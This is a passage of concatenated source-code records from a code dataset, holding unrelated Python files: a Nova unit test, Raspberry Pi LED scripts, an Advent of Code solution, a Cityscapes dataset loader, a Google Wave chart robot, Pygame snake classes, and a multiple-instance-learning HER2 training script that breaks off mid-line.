name='convert_app',\n version='1.0.0',\n author='Alessio Izzo',\n author_email='alessio.izzo86@gmail.com',\n description='An online currency converter',\n long_description=__doc__,\n packages=packages,\n install_requires=install_requires,\n include_package_data=True,\n classifiers=[\n 'Development Status :: 1 - Beta',\n 'Programming Language :: Python',\n 'Environment :: Web Environment',\n 'Operating System :: OS Independent',\n 'Intended Audience :: Developers',\n 'Topic :: System :: Software Distribution',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: Implementation :: PyPy',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ]\n)\n","repo_name":"aless10/CurrencyConverter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28564166977","text":"from nova.compute import arch\nfrom nova import context\nfrom nova import objects\nfrom nova import test\n\n\nclass InstanceTypeExtraSpecsTestCase(test.TestCase):\n\n def setUp(self):\n super(InstanceTypeExtraSpecsTestCase, self).setUp()\n self.context = context.get_admin_context()\n flavor = objects.Flavor(context=self.context,\n name=\"cg1.4xlarge\",\n memory_mb=22000,\n vcpus=8,\n root_gb=1690,\n ephemeral_gb=2000,\n flavorid=105)\n 
self.specs = dict(cpu_arch=arch.X86_64,\n cpu_model=\"Nehalem\",\n xpu_arch=\"fermi\",\n xpus=\"2\",\n xpu_model=\"Tesla 2050\")\n flavor.extra_specs = self.specs\n flavor.create()\n self.flavor = flavor\n self.instance_type_id = flavor.id\n self.flavorid = flavor.flavorid\n\n def tearDown(self):\n # Remove the instance type from the database\n self.flavor.destroy()\n super(InstanceTypeExtraSpecsTestCase, self).tearDown()\n\n def test_instance_type_specs_get(self):\n flavor = objects.Flavor.get_by_flavor_id(self.context,\n self.flavorid)\n self.assertEqual(self.specs, flavor.extra_specs)\n\n def test_flavor_extra_specs_delete(self):\n del self.specs[\"xpu_model\"]\n del self.flavor.extra_specs['xpu_model']\n self.flavor.save()\n flavor = objects.Flavor.get_by_flavor_id(self.context,\n self.flavorid)\n self.assertEqual(self.specs, flavor.extra_specs)\n\n def test_instance_type_extra_specs_update(self):\n self.specs[\"cpu_model\"] = \"Sandy Bridge\"\n self.flavor.extra_specs[\"cpu_model\"] = \"Sandy Bridge\"\n self.flavor.save()\n flavor = objects.Flavor.get_by_flavor_id(self.context,\n self.flavorid)\n self.assertEqual(self.specs, flavor.extra_specs)\n\n def test_instance_type_extra_specs_create(self):\n net_attrs = {\n \"net_arch\": \"ethernet\",\n \"net_mbps\": \"10000\"\n }\n self.specs.update(net_attrs)\n self.flavor.extra_specs.update(net_attrs)\n self.flavor.save()\n flavor = objects.Flavor.get_by_flavor_id(self.context,\n self.flavorid)\n self.assertEqual(self.specs, flavor.extra_specs)\n\n def test_instance_type_get_with_extra_specs(self):\n flavor = objects.Flavor.get_by_id(self.context, 5)\n self.assertEqual(flavor.extra_specs, {})\n\n def test_instance_type_get_by_name_with_extra_specs(self):\n flavor = objects.Flavor.get_by_name(self.context,\n \"cg1.4xlarge\")\n self.assertEqual(flavor.extra_specs, self.specs)\n flavor = objects.Flavor.get_by_name(self.context,\n \"m1.small\")\n self.assertEqual(flavor.extra_specs, {})\n\n def test_instance_type_get_by_flavor_id_with_extra_specs(self):\n flavor = objects.Flavor.get_by_flavor_id(self.context, 105)\n self.assertEqual(flavor.extra_specs, self.specs)\n flavor = objects.Flavor.get_by_flavor_id(self.context, 2)\n self.assertEqual(flavor.extra_specs, {})\n\n def test_instance_type_get_all(self):\n flavors = objects.FlavorList.get_all(self.context)\n\n name2specs = {flavor.name: flavor.extra_specs\n for flavor in flavors}\n\n self.assertEqual(name2specs['cg1.4xlarge'], self.specs)\n self.assertEqual(name2specs['m1.small'], {})\n","repo_name":"BU-NU-CLOUD-SP16/Trusted-Platform-Module-nova","sub_path":"nova/tests/unit/test_instance_types_extra_specs.py","file_name":"test_instance_types_extra_specs.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"21462612700","text":"# Simple demo of of the WS2801/SPI-like addressable RGB LED lights.\nimport time\nimport RPi.GPIO as GPIO\n \n# Import the WS2801 module.\nimport Adafruit_WS2801\nimport Adafruit_GPIO.SPI as SPI\n \n \n# Configure the count of pixels:\nPIXEL_COUNT = 191\n \n# Alternatively specify a hardware SPI connection on /dev/spidev0.0:\nSPI_PORT = 0\nSPI_DEVICE = 0\npixels = Adafruit_WS2801.WS2801Pixels(PIXEL_COUNT, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE), gpio=GPIO)\n \n \n# Define the wheel function to interpolate between different hues.\ndef wheel(pos):\n if pos < 85:\n return Adafruit_WS2801.RGB_to_color(pos * 3, 255 - pos * 3, 0)\n elif pos < 170:\n pos -= 85\n return 
Adafruit_WS2801.RGB_to_color(255 - pos * 3, 0, pos * 3)\n else:\n pos -= 170\n return Adafruit_WS2801.RGB_to_color(0, pos * 3, 255 - pos * 3)\n \n \ndef rainbow_cycle(pixels, wait=0.005):\n for j in range(256): # one cycle of all 256 colors in the wheel\n for i in range(pixels.count()):\n pixels.set_pixel(i, wheel(((i * 256 // pixels.count()) + j) % 256) )\n pixels.show()\n if wait > 0:\n time.sleep(wait)\n \n \n \n \nif __name__ == \"__main__\":\n # Clear all the pixels to turn them off.\n pixels.clear()\n pixels.show() # Make sure to call show() after changing any pixels!\n\n while True: \n rainbow_cycle(pixels, wait=0.001)\n \n \n \n \n \n \n","repo_name":"aws-samples/aws-builders-fair-projects","sub_path":"reinvent-2019/rhythm-cloud/pi/idleMode.py","file_name":"idleMode.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"48"} +{"seq_id":"10508268275","text":"from collections import Counter\n\nwith open(\"day10.input\") as f:\n data = map(int, f.readlines())\n\n# data = [int(l) for l in \"\"\"16\n# 10\n# 15\n# 5\n# 1\n# 11\n# 7\n# 19\n# 6\n# 12\n# 4\"\"\".split(\"\\n\")]\n\n# data = [int(l) for l in \"\"\"28\n# 33\n# 18\n# 42\n# 31\n# 14\n# 46\n# 20\n# 48\n# 47\n# 24\n# 23\n# 49\n# 45\n# 19\n# 38\n# 39\n# 11\n# 1\n# 32\n# 25\n# 35\n# 8\n# 17\n# 7\n# 9\n# 4\n# 2\n# 34\n# 10\n# 3\"\"\".split(\"\\n\")]\n\nseq = sorted(data)\n\n# Part 1\ncounter = Counter(b - a for a, b in zip([0] + seq, seq))\nprint(counter[1] * (counter[3] + 1))\n\n# Part 2\ncounter = Counter({0: 1})\nfor x in seq:\n counter[x] = sum(counter[i] for i in range(x - 3, x))\nprint(counter[seq[-1]])\n","repo_name":"Jemgoss/adventofcode","sub_path":"2020/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37218776604","text":"#%%\n# from haven import utils as mlkit_ut\n\nfrom PIL import Image\nimport numpy as np\nimport torch\nfrom scipy.ndimage.morphology import distance_transform_edt\nimport os\nfrom haven import haven_utils as hu\nfrom haven import haven_img as hi\nfrom skimage.io import imread\nfrom scipy.io import loadmat\nimport torchvision.transforms.functional as FT\nimport numpy as np\nimport torch\nfrom skimage.io import imread\nimport torchvision.transforms.functional as FT\nfrom skimage.transform import rescale\nimport torchvision\nfrom torchvision import datasets\nfrom torchvision.transforms import transforms\nimport pylab as plt\nfrom skimage.color import label2rgb\n# from repos.selectivesearch.selectivesearch import selective_search\n\n\nclass CityScapes:\n def __init__(self, split, exp_dict):\n\n path = '/mnt/public/datasets/cityscapes'\n self.split = split\n self.exp_dict = exp_dict\n self.n_classes = 19\n\n if split == \"train\":\n resize = True\n flip = False\n \n \n self.transforms = lambda image, targets:joint_transform(image, \n targets, resize=resize, flip=flip)\n else:\n resize = True\n split = 'val'\n self.transforms = lambda image, targets:joint_transform_val(image, \n targets, resize=resize)\n \n # self.effort_per_image = 90*60\n self.dataset = CityScapesTrainIds(path, \n split=split, \n mode='fine',\n # transforms=transforms,\n target_type=['semantic','instance'])\n\n self.transform = joint_transform\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, index):\n images, targets_instance = self.dataset[index]\n targets, mask_inst = targets_instance\n images, 
targets, flipped = self.transforms(images, targets)\n\n mask_inst = transforms.Resize(size=512, interpolation=Image.NEAREST)(mask_inst)\n mask_inst = torch.from_numpy(np.array(mask_inst))\n mask_inst = mask_inst.long()\n inst = torch.zeros(targets.shape).long()\n classes = np.unique(targets)\n\n category_id2label_id = {28:1, 26:2, 27:3, 24:4, 25:5,\n 32:6, 31:7, 33:8}\n\n uniques = np.unique(mask_inst)\n point_list = []\n selected = set()\n inst_id = 0\n for category_id in category_id2label_id.keys():\n instances = uniques[(uniques>=category_id*1000) & (uniques<(category_id+1)*1000)]\n if len(instances) == 0:\n continue\n\n # ind = ((mask_inst>=category_id*1000) & \n # (mask_inst<(category_id+1)*1000))\n # class_id = category_id2label_id[category_id]\n for i, u in enumerate(instances):\n seg_ind = mask_inst==u\n inst[seg_ind] = inst_id\n inst_id += 1\n dist = distance_transform_edt(seg_ind)\n yx = np.unravel_index(dist.argmax(), dist.shape)\n class_id = int(targets[yx])\n if class_id == 255:\n continue\n\n if class_id >= self.n_classes:\n raise ValueError('not found')\n \n selected.add(class_id)\n point_list += [{'y':yx[0], 'x':yx[1], 'cls':class_id}]\n \n for l in np.setdiff1d(classes, list(selected) + [255]):\n y_list, x_list = np.where(targets == l)\n yc, xc = get_median(y_list, x_list)\n class_id = int(targets[yc, xc])\n if class_id == 255:\n continue\n \n if class_id >= self.n_classes:\n raise ValueError('not found')\n\n point_list += [{'y':yc, 'x':xc, 'cls':class_id}]\n\n # if 1:\n # y_list = [p['y'] for p in point_list]\n # x_list = [p['x'] for p in point_list]\n # img_prop_lbl = hi.points_on_image(y_list, x_list, inv_transform(images), radius=10)\n # hu.save_image('tmp.png', img_prop_lbl)\n\n assert flipped == False\n # cost_mask = CsObject().get_clicks_from_polygons(images.size(1), images.size(2), polygons)\n # cost = torch.from_numpy(cost)\n\n # masks, cost = targets\n # regions = self.region[index]\n \n # batch_dict = {'images':img, \n # 'masks':mask,\n # 'meta':{'index':index, 'split':self.split, 'size':(H,W), 'name':name}}\n # point_list = pascal.get\n H,W = images.shape[-2:]\n points = torch.ones((H,W)) * 255\n for p in point_list:\n points[p['y'], p['x']] = p['cls']\n # hu.save_image(fname='tmp.png', img=hu.get_image(images, denorm=True), \n # points=(points!=255), )\n batch = {\"images\": images,\n # \"cost_mask\": cost_mask,\n # \"region_list\": region_list,\n # 'inst':inst,\n 'point_list':point_list,\n 'points':points,\n 'flipped':flipped,\n \"masks\": targets,\n \"original\":inv_transform(images),\n \"meta\": {\"index\": index,\n 'hash':hu.hash_dict({'id':index, 'split':self.split}),\n \"name\": self.dataset.images[index],\n \"size\": images.shape[-2:],\n \"image_id\": index,\n \"split\": self.split}}\n return batch\n\n# =====================================\n# helpers\ndef get_random(y_list, x_list):\n with hu.random_seed(1):\n yi = np.random.choice(y_list)\n x_tmp = x_list[y_list == yi]\n xi = np.random.choice(x_tmp)\n\n return yi, xi\n\ndef get_median(y_list, x_list):\n tmp = y_list\n mid = max(0, len(tmp)//2 - 1)\n yi = tmp[mid]\n tmp = x_list[y_list == yi]\n mid = max(0, len(tmp)//2 - 1)\n xi = tmp[mid]\n\n return yi, xi\n\ndef joint_transform(image, targets, resize=False, flip=False):\n mask = targets\n\n # Resize\n if resize:\n image = transforms.Resize(size=512, interpolation=Image.BILINEAR)(image)\n mask = transforms.Resize(size=512, interpolation=Image.NEAREST)(mask)\n\n # Random crop\n # i, j, h, w = transforms.RandomCrop.get_params(\n # image, 
output_size=(256, 512))\n    # image = FT.crop(image, i, j, h, w)\n    # mask = FT.crop(mask, i, j, h, w)\n\n    # Random horizontal flipping\n    flipped = False\n    if np.random.randint(2) == 0 and flip:\n        image = FT.hflip(image)\n        mask = FT.hflip(mask)\n        flipped = True\n\n    # # Random vertical flipping\n    # if random.random() > 0.5:\n    #     image = FT.vflip(image)\n    #     mask = FT.vflip(mask)\n\n    # Transform to tensor\n    image = FT.to_tensor(image)\n    mask = torch.from_numpy(np.array(mask))\n    mask = mask.long()\n\n    mean = [0.485, 0.456, 0.406]\n    std = [0.229, 0.224, 0.225]\n\n    image_normalized = transforms.Normalize(mean=mean, std=std)(image)\n\n    # cost = CsObject().get_clicks_from_polygons(image.size(1), image.size(2), polygons)\n    # cost = torch.from_numpy(cost)\n    # return image_normalized, (mask, cost)\n    return image_normalized, mask, flipped\n\n# =====================================\n# helpers\ndef joint_transform_val(image, targets, resize=False):\n    mask = targets\n    if resize:\n        # Resize\n        image = transforms.Resize(size=512, interpolation=Image.BILINEAR)(image)\n        mask = transforms.Resize(size=512, interpolation=Image.NEAREST)(mask)\n\n    # # Random crop\n    # i, j, h, w = transforms.RandomCrop.get_params(\n    #     image, output_size=(256, 512))\n    # image = FT.crop(image, i, j, h, w)\n    # mask = FT.crop(mask, i, j, h, w)\n\n    # # Random horizontal flipping\n    # if random.random() > 0.5:\n    #     image = FT.hflip(image)\n    #     mask = FT.hflip(mask)\n\n    # # Random vertical flipping\n    # if random.random() > 0.5:\n    #     image = FT.vflip(image)\n    #     mask = FT.vflip(mask)\n\n    # Transform to tensor\n    image = FT.to_tensor(image)\n    mask = torch.from_numpy(np.array(mask))\n    mask = mask.long()\n\n    mean = [0.485, 0.456, 0.406]\n    std = [0.229, 0.224, 0.225]\n\n    image_normalized = transforms.Normalize(mean=mean, std=std)(image)\n\n    # cost = CsObject().get_clicks_from_polygons(image.size(1), image.size(2), polygons)\n    # cost = torch.from_numpy(cost)\n    # return image_normalized, (mask, cost)\n    flipped = False\n    return image_normalized, mask, flipped\n\ndef inv_transform(images):\n    # std entries are the reciprocals of the forward-normalization std [0.229, 0.224, 0.225]\n    inv_normalize = transforms.Normalize(\n        mean=[-0.485/0.229, -0.456/0.224, -0.406/0.225],\n        std=[1/0.229, 1/0.224, 1/0.225])\n\n    inv_image = inv_normalize(images.float())\n    images_arr = np.array(FT.to_pil_image(inv_image.float()))\n\n    return images_arr\n\n\nclass CityScapesTrainIds(datasets.Cityscapes):\n    def __init__(self, root, split='train', mode='fine', target_type='instance',\n                 transform=None, target_transform=None, transforms=None):\n        super().__init__(root, split, mode, target_type,\n                         transform, target_transform, transforms)\n\n    def _get_target_suffix(self, mode, target_type):\n        if target_type == 'instance':\n            return '{}_instanceIds.png'.format(mode)\n        elif target_type == 'semantic':\n            # return '{}_labelIds.png'.format(mode)\n            return '{}_labelTrainIds.png'.format(mode)\n        elif target_type == 'color':\n            return '{}_color.png'.format(mode)\n        else:\n            return '{}_polygons.json'.format(mode)\n\n\nif __name__ == \"__main__\":\n    dataset = CityScapes(split=\"train\", exp_dict={})\n    batch = dataset[0]\n    images = batch[\"images\"]\n    masks = batch[\"masks\"]\n\n    inv_normalize = transforms.Normalize(\n        mean=[-0.485/0.229, -0.456/0.224, -0.406/0.225],\n        std=[1/0.229, 1/0.224, 1/0.225])\n\n    inv_image = inv_normalize(images.float())\n    \n    # combined = 0.5*inv_image + 0.5*masks\n    masks_arr = np.array(FT.to_pil_image(masks.float()))\n    images_arr = np.array(FT.to_pil_image(inv_image.float()))\n\n    image_label_overlay = label2rgb(masks_arr, image=images_arr)\n\n    inv_image = 
FT.to_pil_image(inv_image)\n\n plt.imshow(images_arr)\n plt.savefig(\"img.png\")\n plt.imshow(masks_arr)\n plt.savefig(\"mask.png\")\n plt.imshow(image_label_overlay)\n plt.savefig(\"overlay.png\")","repo_name":"IssamLaradji/affinity_lcfcn","sub_path":"src/datasets/cityscapes.py","file_name":"cityscapes.py","file_ext":"py","file_size_in_byte":10435,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"71370615505","text":"import logging\nimport re\n\nfrom api import document\nfrom api import events\nfrom api import model\nfrom api import robot\n\nROBOT_NAME = 'graphy'\n\n\nclass WaveEnv(object):\n def __init__(self, context):\n self.result = None\n self.api = context\n\ndef FindImageElement(blip):\n elements = blip.GetDocument()._blip_data.elements\n if elements:\n for key in elements:\n element = elements[key]\n if element['type'] == 'IMAGE' and u'properties' in element and \\\n u'url' in element['properties']:\n url = element['properties']['url']\n \n if \"http://chart.apis.google.com/chart?\" in url:\n return (element, key)\n return (None, None)\n\ndef GenerateChartUrlFromText(text):\n if \"graph:\" not in text.lower():\n return None\n after = text[(text.lower().find(\"graph:\") + 6):]\n datarows = []\n \n datalinere = re.compile(\n \"([^:]+[:])?([ \\t]*[0-9]+)([ \\t]*[,][ \\t]*[0-9]+)*[ \\t]*\")\n mdata = 0\n for line in after.split(\"\\n\"):\n linematch = datalinere.match(line.strip())\n if linematch:\n line = linematch.group(0)\n row = {}\n if \":\" in line:\n sl = line.split(\":\")\n row['name'] = sl[0]\n line = sl[1]\n dataelems = [i.strip() for i in line.split(\",\")]\n m = max([float(i) for i in dataelems])\n if m > mdata:\n mdata = m\n row['data'] = dataelems\n datarows.append(row)\n dim = 0\n for row in datarows:\n d = len(row['data'])\n if d > dim:\n dim = d\n \n mdata = mdata / 100.0\n if dim == 1:\n # pie chart\n nums = []\n names = []\n for row in datarows:\n nums.append(row['data'][0])\n if 'name' in row:\n names.append(row['name'])\n url = \"http://chart.apis.google.com/chart?cht=p3&chs=375x150&chd=t:\"\n url += \",\".join([str(float(i)/mdata) for i in nums])\n if len(nums) == len(names):\n url += \"&chl=\" + \"%7C\".join(names)\n url = url.replace(\" \", \"%20\")\n logging.info(\"Pie chart url: \" + url)\n return url\n else:\n # line graph\n url = \"http://chart.apis.google.com/chart?cht=lc&chs=375x150\"\n # line colors\n url += \"&chco=ff0000,0000ff,00ff00,ffff00,00ffff,ff00ff\"\n # background gradiant\n url += \"&chf=c,lg,90,76A4FB,0,FFFFFF,0.75|bg,s,FFFFFF\"\n # data\n url += \"&chd=t:\"\n nums = []\n names = []\n for row in datarows:\n nums.append(row['data'])\n if 'name' in row:\n names.append(row['name'])\n url += \"|\".join([\",\".join([str(float(j)/mdata) for j in i]) for i in nums])\n if len(nums) == len(names):\n url += \"&chdl=\" + \"|\".join(names)\n url = url.replace(\" \", \"%20\")\n logging.info(\"Line graph url: \" + url)\n return url\n\ndef OnDocumentChanged(properties, context):\n \"\"\"Invoked when the document changes.\"\"\"\n blip_id = properties['blipId']\n blip = context.GetBlipById(blip_id)\n text = blip.GetDocument().GetText()\n url = GenerateChartUrlFromText(text)\n if not url:\n return\n imgElement, elemnum = FindImageElement(blip)\n if imgElement:\n if imgElement['properties']['url'] == url:\n logging.info(\"Url already exists.\")\n return\n\n element = document.Image(url)\n if imgElement:\n blip.GetDocument().ReplaceElement(elemnum, element)\n else:\n 
blip.GetDocument().AppendElement(element)\n\nif __name__ == '__main__':\n graphy = robot.Robot(ROBOT_NAME.capitalize())\n graphy.RegisterHandler(events.DOCUMENT_CHANGED,\n OnDocumentChanged)\n graphy.Run(debug=True)\n","repo_name":"JackDanger/google-wave-samples","sub_path":"extensions/robots/python/graphy/graphy.py","file_name":"graphy.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"4022879957","text":"# Pygame Imports\nimport pygame\nfrom pygame import Surface\nfrom pygame import Rect\n\n\nclass Snake:\n def __init__(self, color: tuple, x: int, y: int, width: int, height: int, size: int = 3) -> None:\n # Basics Attributes\n self.width: int = width\n self.height: int = height\n self.color: tuple = color\n self.x: int = x\n self.y: int = y\n self.size: int = size\n self.direction: tuple[int, int] = [1, 0]\n self._positions: list = [(self.x, self.y),]\n\n # Create first shape\n self.add_shape()\n self.add_shape()\n self.add_shape()\n\n def area(self) -> tuple:\n return (self.x, self.y), (self.x + self.width, self.y), (self.x + self.width, self.y + self.height), (self.x, self.y + self.height)\n\n def move(self) -> list:\n \"\"\"Ajust positions by a vector 2d\"\"\"\n\n self._positions.insert(0, (\n self._positions[0][0] + self.width * self.direction[0], \n self._positions[0][1] + self.height * self.direction[1]\n ))\n\n self.x = self._positions[0][0] + self.width * self.direction[0]\n self.y = self._positions[0][1] + self.height * self.direction[1]\n\n del self._positions[-1]\n\n def add_shape(self) -> None:\n \"\"\"Create a shape in the end of snake\"\"\"\n\n self._positions.append((\n self._positions[-1][0] - self.width * self.direction[0], \n self._positions[-1][1] - self.height * self.direction[1]\n ))\n\n def draw(self, surface: Surface) -> tuple:\n for pos in self._positions:\n pygame.draw.rect(surface, self.color, Rect(*pos, self.width, self.height))\n\n\nclass Food:\n def __init__(self, color: tuple, x: int, y: int, width: int, height: int) -> None:\n self.color: tuple = color\n self.x: int = x\n self.y: int = y\n self.width: int = width\n self.height: int = height\n\n def area(self) -> tuple:\n return [(self.x, self.y), (self.x + self.width, self.y), (self.x + self.width, self.y + self.height), (self.x, self.y + self.height)]\n\n def draw(self, surface: Surface) -> tuple:\n pygame.draw.rect(surface, self.color, Rect(self.x, self.y, self.width, self.height))\n","repo_name":"cristilianojr/Snake-Game","sub_path":"edit/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1127076125","text":"###########################################################################################\n# Name: Norman Cook\n# Date: 06-28-2019\n# Description: Continuously blink an LED at 0.5 s intervals and change the\n# interval to 0.1 s if a switch is closed using a Raspberry Pi.\n################################################################################\n\n# import necessary libraries\nimport RPi.GPIO as GPIO\nfrom time import sleep\n\n# set the button and led pin numbers\nled = 17\nbutton = 25\n\n# setup the led and buttion with the GPIO\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(led, GPIO.OUT)\nGPIO.setup(button, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\n# blink the LED \nwhile (True):\n GPIO.output(led, GPIO.HIGH)\n sleep(0.5)\n GPIO.output(led, GPIO.LOW)\n sleep(0.5)\n 
while (GPIO.input(button) == GPIO.HIGH):\n GPIO.output(led, GPIO.HIGH)\n sleep(0.1)\n GPIO.output(led, GPIO.LOW)\n sleep(0.1)\n\n","repo_name":"frankiecook/classwork","sub_path":"python/LED-the-Way.py","file_name":"LED-the-Way.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7124108393","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Rawan Abdulsadig\n\"\"\"\n\nimport pickle\nimport pandas as pd\nimport time\nimport h5py\nimport torch\nfrom torchvision import models, transforms\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nfrom sklearn.model_selection import KFold\n\n\ndef get_bag_of_instances(X_ , Y_ , S_ ,transform, bag_size, iterations):\n '''\n Parameters\n ----------\n X_ : np.array\n an array of image patches \n Y_ : np.array\n an array of patch labels (patches extracted from the same slide image should have the same label corresponding to the slide HER2 score)\n S_ : np.array\n an array of slide numbers/ids corresponding to the patches\n transform : torchvision.transforms object\n a transforms object to apply image prerpocessing and augmentation\n bag_size : int\n the number of patch instances in the bag\n iterations : int\n the number of bags to be obtained when iterating through the function\n\n Yields\n ------\n a tuple of 2 torch tensors\n first element: 4-dimentional tensor representing the bag of transformed patch images\n second element: a tensor containing the label of the bag\n '''\n for _ in range(iterations):\n #Choosing a random slide number/id\n slids = np.unique(S_)\n s = np.random.choice(slids)\n #Obtaining the HER2 score of that slide\n label = np.max(Y_[S_==s]) # no critical reason for using max, they all should be the same anyway\n x = X_[S_==s] #filtering the patches corresponding to the selected slide\n x_bag = x[np.random.choice(x.shape[0], size=bag_size, replace=False)] #Obtaining a random sample of patch images from x to represent the bag, sampling without replacement\n x_tesnor_bag = torch.empty(size=(bag_size, 3, 96, 96))\n for i in range(bag_size):\n x_tesnor_bag[i] = transform(x_bag[i]) #preprocessing and augmenting the patches then storing them in a torch.tensor (torchvision.transforms only work on one image at a time)\n yield x_tesnor_bag , torch.tensor(label)\n\ndef get_batch_of_bags(X_, Y_, S_, transform, bag_size , batch_size , iterations , seed = None):\n '''\n\n Parameters\n ----------\n X_ : np.array\n an array of image patches \n Y_ : np.array\n an array of patch labels (patches extracted from the same slide image should have the same label corresponding to the slide HER2 score)\n S_ : np.array\n an array of slide numbers/ids corresponding to the patches\n transform : torchvision.transforms object\n a transforms object to apply image prerpocessing and augmentation\n bag_size : int\n the number of patch instances in the bag\n batch_size : int\n the number of bags of patches in a batch\n iterations : int\n the number of batches to be obtained when iterating through the function\n seed : int, optional\n a random seed that can be set to reproduce the exact same batches of bags everytime the function is used, or can be set to None to obtain different batches of bags each time. 
The default is None.\n\n Yields\n ------\n batch_of_bags : 5-dimensional torch.tensor\n a batch of bags of patch images\n batch_of_labels: 1-dimentional torch.tensor\n a batch of labels corresponding to the bags\n\n '''\n np.random.seed(seed)\n for _ in range(iterations):\n batch_of_bags = torch.empty(size=(batch_size, bag_size, 3, 96, 96))\n batch_of_labels = torch.empty(size=(batch_size))\n for i,(images, label) in enumerate(get_bag_of_instances(X_, Y_, S_ , transform=transform\n ,bag_size = bag_size , iterations = batch_size)):\n batch_of_bags[i] = images\n batch_of_labels[i] = label\n yield batch_of_bags , batch_of_labels\n\nclass AddGaussianNoise(object):\n '''\n To be used as an augmentation method within \"transforms\"\n '''\n def __init__(self, mean=0., std=1.):\n self.std = std\n self.mean = mean\n\n def __call__(self, tensor):\n return tensor + torch.randn(tensor.size()) * self.std + self.mean\n\n\n\nclass MILNetwork(nn.Module):\n def __init__(self , embeddeing_model , bag_size , batch_size , classes):\n '''\n Parameters\n ----------\n embeddeing_model : model object\n the pre-trained patch embedding model \n bag_size : int\n the number of patch images in a bag\n batch_size : int\n the number of bags in a batch\n classes : int\n the number of target classes, 4 for HER2 grades or 2 for HER2 positive/negative\n\n '''\n super(MILNetwork, self).__init__()\n self.bag_size = bag_size\n self.batch_size = batch_size\n self.embedder = embeddeing_model\n self.fc1 = nn.Linear(1024, classes)\n self.attention = nn.Sequential(\n nn.Conv1d(1024,256,1),\n nn.Tanh(),\n nn.Conv1d(256,1,1))\n\n def forward(self, x):\n out = torch.empty(size=(self.batch_size, 1024, self.bag_size)).cuda()\n for i in range(x.shape[0]):\n x_ = self.embedder.forward(x[i])\n x_ = x_.view(-1,1024)\n out[i] = x_.permute(1,0)\n A = self.attention(out)\n A = F.softmax(A , dim =2)\n M = torch.bmm(A, torch.transpose(out , 2, 1))\n M = M.view(-1, 1024)\n out = self.fc1(M)\n return out\n \n\ndef Train_Model(model , From, criterion , optimizer , n_epochs , bag_size, batch_size, filename, x_train,y_train,s_train,x_valid,y_valid,s_valid):\n '''\n \n Parameters\n ----------\n model : MILNetwork object\n initialized MIL model object\n From : string\n a string specifiying what type of source domain images the embedding model is transfered from, either 'ImageNet', 'PCAM' , 'IHC' or 'Random'\n criterion : loss function object\n optimizer : optim optimizer object\n n_epochs : int\n number of epochs\n bag_size : int\n number of patch images in a bag\n batch_size : int\n number of bags in a batch\n filename : string\n a file name to be used when saving the model parameters\n x_train : np.array\n training patch images\n y_train : np.array\n training patch image labels \n s_train : np.array\n training slide number/id\n x_valid : np.array\n validation patch images\n y_valid : np.array\n validation patch image labels \n s_valid : np.array\n validation slide number/id\n\n Returns\n -------\n training_loss : np.array\n the recorded training losses in each epoch\n validation_loss : np.array\n the recorded validation losses in each epoch\n training_acc : np.array\n the recorded training accuracies in each epoch\n validation_acc : np.array\n the recorded validation accuracies in each epoch\n\n '''\n\n min_valid_loss , max_valid_acc = np.Inf , 0.0\n training_iterations = 100\n validation_iterations = 25\n valid_loss_min = min_valid_loss\n valid_acc_max = max_valid_acc\n training_loss , validation_loss = [], []\n training_acc , validation_acc = [] , 
[]\n \n for epoch in range(1, n_epochs+1):\n train_loss = 0.0\n valid_loss = 0.0\n \n ############\n # Training #\n ############\n y_true , y_pred = [] , []\n model.train()\n # preparing the transform object for training\n if From == 'Random':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n transforms.RandomAffine(degrees=10, translate=(0.1,0.1), scale=(0.8,1.2), shear=10, fillcolor=(245, 245, 245)),\n transforms.ToTensor()\n ,transforms.RandomApply([AddGaussianNoise(0., 0.1)], p=0.5)\n ])\n elif From == 'ImageNet':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n transforms.RandomAffine(degrees=10, translate=(0.1,0.1), scale=(0.8,1.2), shear=10, fillcolor=(245, 245, 245)),\n transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ,transforms.RandomApply([AddGaussianNoise(0., 0.1)], p=0.5)\n ])\n elif From == 'PCAM':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n transforms.RandomAffine(degrees=10, translate=(0.1,0.1), scale=(0.8,1.2), shear=10, fillcolor=(245, 245, 245)),\n transforms.ToTensor(), transforms.Normalize(mean=[1.0294, 0.5995, 1.3757], std=[0.8379, 1.0470, 0.8024])\n ,transforms.RandomApply([AddGaussianNoise(0., 0.1)], p=0.5)\n ])\n elif From == 'IHC':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ColorJitter(brightness=0.1, contrast=0.1, 